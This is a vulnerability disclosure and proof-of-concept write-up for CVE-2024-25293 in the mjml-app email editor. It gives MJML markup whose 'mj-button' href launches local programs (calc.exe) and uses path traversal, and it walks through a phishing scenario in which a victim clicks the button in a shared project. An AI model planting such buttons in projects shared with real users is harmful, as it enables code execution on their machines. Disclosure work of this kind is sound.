Share
## https://sploitus.com/exploit?id=8FB8A14C-3745-5BA2-B752-6EB0EF19F0CC
# MJML Local Code Execution PoC

A Proof-Of-Concept for CVE-2024-25293 vulnerability. <br><br>
mjml-app v3.0.4 & 3.1.0-beta was discovered to contain a remote code execution (RCE)
In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it.

As a PoC there is a python file that automates the process. 
---------------------------------------

### 1.Vunerability Overview:
 * Vulnerability Subject: Local Code Execution
 * Vulnerability Version: mjml-app 3.0.4-win & mjml-app 3.1.0-beta
 * Attack Type: Remote Code Execution
 * Attack Component: In the 'mj-button' tag within the affected source code file, the 'href' attribute enables local code execution.
 * Reserved CVE Number: CVE-2024-25293

---------------------------------------

### 2. Vulnerability Cause:
*  mjml-app 3.0.4-win & mjml-app 3.1.0 beta suffers from Security Misconfiguration In the 'mj-button' tag, which can result in arbitrary code execution.
* Exploit explain
  * Running local files through event tags in mjml applications poses a security threat. In addition, the code can be executed by combining Path Traversal within the application, requiring a patch.
![image](https://github.com/EQSTLab/PoC/assets/131337101/98d338c6-812d-4329-93df-2c64bb636868)

Proof-of-concept (POC)
----------------------
**Step 1) The attacker creates an 'mj-button' with an 'href' tag and**
* **case 1) Code Execution with Path Traversal (notepad.exe)**
* **case 2) Code Execution (calc.exe)**

```html
<mjml>
  <mj-body>
    <mj-section>
      <mj-column>
        <mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
        <mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>
      </mj-column>
    </mj-section>
  </mj-body>
</mjml>
```
![mjml1](https://github.com/QnA4u/CVE/assets/131337101/862946a8-18f8-4d09-a850-6a296588780a)

**Step 2) The attacker creates the main phishing project with the following code.**
```py
<!-- header.mjml -->
<mj-section>
  <mj-column>
    <mj-text>This is a demo jruru</mj-text>
  </mj-column>
</mj-section>
<!-- main.mjml -->
<mj-include path="./index.mjml" />
```
![mjml2](https://github.com/QnA4u/CVE/assets/131337101/aaf108f9-a2d6-4e21-baf9-7f50266e5afa)

**Step 3) The victim opens the shared project and clicks the button, triggering the execution of payload(etc. calc , notepad)**
![mjml3](https://github.com/QnA4u/CVE/assets/131337101/a15a815f-94b8-4e20-b15f-a9d90c5dcdce)

---------------------------------------

### 3. Additional Information
Running exe files through href tags within an application is risky, and running files in combination with Path Traversal is a security concern. This allows phishing projects to be created and deployed to execute local files. Therefore, it is essential to modify this feature to prevent such execution.